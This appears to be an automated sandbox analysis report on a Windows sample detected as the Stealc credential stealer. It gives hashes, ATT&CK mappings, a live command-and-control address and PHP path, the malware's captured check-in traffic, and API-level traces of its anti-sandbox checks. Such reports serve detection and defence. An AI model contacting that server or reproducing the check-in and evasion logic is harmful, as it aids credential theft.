                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00477A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00477A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.460000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2052957198.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.460000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2052957198.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory651
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/wsfile.exe, 00000000.00000002.2094357724.0000000000ECF000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37afile.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.37
                    		unknownPortugal
                    		206894WHOLESALECONNECTIONSNLtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1525191
                    Start date and time:2024-10-03 20:45:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 3m 1s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:2
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 80%
                    • Number of executed functions: 19
                    • Number of non-executed functions: 86
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.37file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    Setup.exeGet hashmaliciousRedLineBrowse
                    • 185.215.113.22
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.947623190255442
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'802'752 bytes
                    MD5:edecdb123ba6a0d389ff9b2993754c49
                    SHA1:d27897486ab7cd802f52731b1e98b9b463854fc0
                    SHA256:c1af8de0dbb010738eacb3fa66d5c3f1ea70ce1c480ac116ccd6bbfec781b1d1
                    SHA512:aaea8500388d2a488108af455a9a6223fe17114132383604dcf9eeebe41f2366ec705880946fcf6103cba10970a7ca0944d9b55ec031f1206d306a434d08715c
                    SSDEEP:24576:iylaOkFij3aXFCxSc792uD21ihKMI3xnjcDSX7Qyqrfy3vIfOb9hlbS53gQ:iylkFXcZ/DEihKMI3VjiSLYbFq90QQ
                    TLSH:9185337A3FD69322C0EF7AB52FA6668A22B2CE3156F8589F1C04547C15471D8FB2B4C0
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                    File Icon

                    Icon Hash:00928e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0xa87000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007F57D4D990FAh
                    punpcklbw mm3, qword ptr [ebx]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add cl, ch
                    add byte ptr [eax], ah
                    add byte ptr [eax], al
                    add byte ptr [edi], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], dh
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax+eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    and al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    or al, 80h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add eax, 0000000Ah
                    add byte ptr [eax], al

                    Rich Headers

                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2010 build 30319

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x25b0000x22800d7d1d63a7eb704a58b4820c0c9fec9c6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x25e0000x2960000x2005da3d2ca74cf4b5d6e598dc4ca788149unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    nqjulsar0x4f40000x1920000x191e0018fff6a414eeedd80ed797fe1e38e779False0.9948356094479005data7.953541884791292IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    snoulpuy0x6860000x10000x600aac337af25137a0e5d6d06219892447dFalse0.5540364583333334data4.936756454301773IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x6870000x30000x22009e77368093bca2c2c04615d569949c48False0.06583180147058823DOS executable (COM)0.7565841088042602IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-10-03T20:46:02.261931+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 3, 2024 20:46:01.287861109 CEST4970480192.168.2.5185.215.113.37
                    Oct 3, 2024 20:46:01.292972088 CEST8049704185.215.113.37192.168.2.5
                    Oct 3, 2024 20:46:01.293071985 CEST4970480192.168.2.5185.215.113.37
                    Oct 3, 2024 20:46:01.293270111 CEST4970480192.168.2.5185.215.113.37
                    Oct 3, 2024 20:46:01.298510075 CEST8049704185.215.113.37192.168.2.5
                    Oct 3, 2024 20:46:02.028907061 CEST8049704185.215.113.37192.168.2.5
                    Oct 3, 2024 20:46:02.029037952 CEST4970480192.168.2.5185.215.113.37
                    Oct 3, 2024 20:46:02.031928062 CEST4970480192.168.2.5185.215.113.37
                    Oct 3, 2024 20:46:02.036823988 CEST8049704185.215.113.37192.168.2.5
                    Oct 3, 2024 20:46:02.261742115 CEST8049704185.215.113.37192.168.2.5
                    Oct 3, 2024 20:46:02.261930943 CEST4970480192.168.2.5185.215.113.37
                    Oct 3, 2024 20:46:04.884344101 CEST4970480192.168.2.5185.215.113.37

                    HTTP Request Dependency Graph

                    • 185.215.113.37

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.549704185.215.113.37805588C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Oct 3, 2024 20:46:01.293270111 CEST89OUTGET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Oct 3, 2024 20:46:02.028907061 CEST203INHTTP/1.1 200 OK
                    Date: Thu, 03 Oct 2024 18:46:01 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Oct 3, 2024 20:46:02.031928062 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBK
                    Host: 185.215.113.37
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 46 45 44 30 37 44 31 37 30 45 31 38 34 35 31 35 30 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 2d 2d 0d 0a
                    Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="hwid"DDFED07D170E1845150070------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="build"doma------GIEBAECAKKFCBFIEGCBK--
                    Oct 3, 2024 20:46:02.261742115 CEST210INHTTP/1.1 200 OK
                    Date: Thu, 03 Oct 2024 18:46:02 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 59 6d 78 76 59 32 73 3d
                    Data Ascii: YmxvY2s=


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:0
                    Start time:14:45:57
                    Start date:03/10/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x460000
                    File size:1'802'752 bytes
                    MD5 hash:EDECDB123BA6A0D389FF9B2993754C49
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2052957198.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:8.3%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.7%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:24
                      execution_graph 13576 4769f0 13621 462260 13576->13621 13600 476a64 13601 47a9b0 4 API calls 13600->13601 13602 476a6b 13601->13602 13603 47a9b0 4 API calls 13602->13603 13604 476a72 13603->13604 13605 47a9b0 4 API calls 13604->13605 13606 476a79 13605->13606 13607 47a9b0 4 API calls 13606->13607 13608 476a80 13607->13608 13773 47a8a0 13608->13773 13610 476b0c 13777 476920 GetSystemTime 13610->13777 13612 476a89 13612->13610 13613 476ac2 OpenEventA 13612->13613 13615 476af5 CloseHandle Sleep 13613->13615 13616 476ad9 13613->13616 13618 476b0a 13615->13618 13620 476ae1 CreateEventA 13616->13620 13618->13612 13620->13610 13974 4645c0 13621->13974 13623 462274 13624 4645c0 2 API calls 13623->13624 13625 46228d 13624->13625 13626 4645c0 2 API calls 13625->13626 13627 4622a6 13626->13627 13628 4645c0 2 API calls 13627->13628 13629 4622bf 13628->13629 13630 4645c0 2 API calls 13629->13630 13631 4622d8 13630->13631 13632 4645c0 2 API calls 13631->13632 13633 4622f1 13632->13633 13634 4645c0 2 API calls 13633->13634 13635 46230a 13634->13635 13636 4645c0 2 API calls 13635->13636 13637 462323 13636->13637 13638 4645c0 2 API calls 13637->13638 13639 46233c 13638->13639 13640 4645c0 2 API calls 13639->13640 13641 462355 13640->13641 13642 4645c0 2 API calls 13641->13642 13643 46236e 13642->13643 13644 4645c0 2 API calls 13643->13644 13645 462387 13644->13645 13646 4645c0 2 API calls 13645->13646 13647 4623a0 13646->13647 13648 4645c0 2 API calls 13647->13648 13649 4623b9 13648->13649 13650 4645c0 2 API calls 13649->13650 13651 4623d2 13650->13651 13652 4645c0 2 API calls 13651->13652 13653 4623eb 13652->13653 13654 4645c0 2 API calls 13653->13654 13655 462404 13654->13655 13656 4645c0 2 API calls 13655->13656 13657 46241d 13656->13657 13658 4645c0 2 API calls 13657->13658 13659 462436 13658->13659 13660 4645c0 2 API calls 13659->13660 13661 46244f 13660->13661 13662 4645c0 2 API calls 13661->13662 13663 462468 13662->13663 13664 4645c0 2 API calls 13663->13664 13665 462481 13664->13665 13666 4645c0 2 API calls 13665->13666 13667 46249a 13666->13667 13668 4645c0 2 API calls 13667->13668 13669 4624b3 13668->13669 13670 4645c0 2 API calls 13669->13670 13671 4624cc 13670->13671 13672 4645c0 2 API calls 13671->13672 13673 4624e5 13672->13673 13674 4645c0 2 API calls 13673->13674 13675 4624fe 13674->13675 13676 4645c0 2 API calls 13675->13676 13677 462517 13676->13677 13678 4645c0 2 API calls 13677->13678 13679 462530 13678->13679 13680 4645c0 2 API calls 13679->13680 13681 462549 13680->13681 13682 4645c0 2 API calls 13681->13682 13683 462562 13682->13683 13684 4645c0 2 API calls 13683->13684 13685 46257b 13684->13685 13686 4645c0 2 API calls 13685->13686 13687 462594 13686->13687 13688 4645c0 2 API calls 13687->13688 13689 4625ad 13688->13689 13690 4645c0 2 API calls 13689->13690 13691 4625c6 13690->13691 13692 4645c0 2 API calls 13691->13692 13693 4625df 13692->13693 13694 4645c0 2 API calls 13693->13694 13695 4625f8 13694->13695 13696 4645c0 2 API calls 13695->13696 13697 462611 13696->13697 13698 4645c0 2 API calls 13697->13698 13699 46262a 13698->13699 13700 4645c0 2 API calls 13699->13700 13701 462643 13700->13701 13702 4645c0 2 API calls 13701->13702 13703 46265c 13702->13703 13704 4645c0 2 API calls 13703->13704 13705 462675 13704->13705 13706 4645c0 2 API calls 13705->13706 13707 46268e 13706->13707 13708 479860 13707->13708 13979 479750 GetPEB 13708->13979 13710 479868 13711 479a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13710->13711 13712 47987a 13710->13712 13713 479af4 GetProcAddress 13711->13713 13714 479b0d 13711->13714 13717 47988c 21 API calls 13712->13717 13713->13714 13715 479b46 13714->13715 13716 479b16 GetProcAddress GetProcAddress 13714->13716 13718 479b4f GetProcAddress 13715->13718 13719 479b68 13715->13719 13716->13715 13717->13711 13718->13719 13720 479b71 GetProcAddress 13719->13720 13721 479b89 13719->13721 13720->13721 13722 479b92 GetProcAddress GetProcAddress 13721->13722 13723 476a00 13721->13723 13722->13723 13724 47a740 13723->13724 13725 47a750 13724->13725 13726 476a0d 13725->13726 13727 47a77e lstrcpy 13725->13727 13728 4611d0 13726->13728 13727->13726 13729 4611e8 13728->13729 13730 461217 13729->13730 13731 46120f ExitProcess 13729->13731 13732 461160 GetSystemInfo 13730->13732 13733 461184 13732->13733 13734 46117c ExitProcess 13732->13734 13735 461110 GetCurrentProcess VirtualAllocExNuma 13733->13735 13736 461141 ExitProcess 13735->13736 13737 461149 13735->13737 13980 4610a0 VirtualAlloc 13737->13980 13740 461220 13984 4789b0 13740->13984 13743 461249 __aulldiv 13744 46129a 13743->13744 13745 461292 ExitProcess 13743->13745 13746 476770 GetUserDefaultLangID 13744->13746 13747 4767d3 13746->13747 13748 476792 13746->13748 13754 461190 13747->13754 13748->13747 13749 4767b7 ExitProcess 13748->13749 13750 4767a3 ExitProcess 13748->13750 13751 4767c1 ExitProcess 13748->13751 13752 4767ad ExitProcess 13748->13752 13753 4767cb ExitProcess 13748->13753 13755 4778e0 3 API calls 13754->13755 13757 46119e 13755->13757 13756 4611cc 13761 477850 GetProcessHeap RtlAllocateHeap GetUserNameA 13756->13761 13757->13756 13758 477850 3 API calls 13757->13758 13759 4611b7 13758->13759 13759->13756 13760 4611c4 ExitProcess 13759->13760 13762 476a30 13761->13762 13763 4778e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13762->13763 13764 476a43 13763->13764 13765 47a9b0 13764->13765 13986 47a710 13765->13986 13767 47a9c1 lstrlen 13769 47a9e0 13767->13769 13768 47aa18 13987 47a7a0 13768->13987 13769->13768 13771 47a9fa lstrcpy lstrcat 13769->13771 13771->13768 13772 47aa24 13772->13600 13774 47a8bb 13773->13774 13775 47a90b 13774->13775 13776 47a8f9 lstrcpy 13774->13776 13775->13612 13776->13775 13991 476820 13777->13991 13779 47698e 13780 476998 sscanf 13779->13780 14020 47a800 13780->14020 13782 4769aa SystemTimeToFileTime SystemTimeToFileTime 13783 4769e0 13782->13783 13784 4769ce 13782->13784 13786 475b10 13783->13786 13784->13783 13785 4769d8 ExitProcess 13784->13785 13787 475b1d 13786->13787 13788 47a740 lstrcpy 13787->13788 13789 475b2e 13788->13789 14022 47a820 lstrlen 13789->14022 13792 47a820 2 API calls 13793 475b64 13792->13793 13794 47a820 2 API calls 13793->13794 13795 475b74 13794->13795 14026 476430 13795->14026 13798 47a820 2 API calls 13799 475b93 13798->13799 13800 47a820 2 API calls 13799->13800 13801 475ba0 13800->13801 13802 47a820 2 API calls 13801->13802 13803 475bad 13802->13803 13804 47a820 2 API calls 13803->13804 13805 475bf9 13804->13805 14035 4626a0 13805->14035 13813 475cc3 13814 476430 lstrcpy 13813->13814 13815 475cd5 13814->13815 13816 47a7a0 lstrcpy 13815->13816 13817 475cf2 13816->13817 13818 47a9b0 4 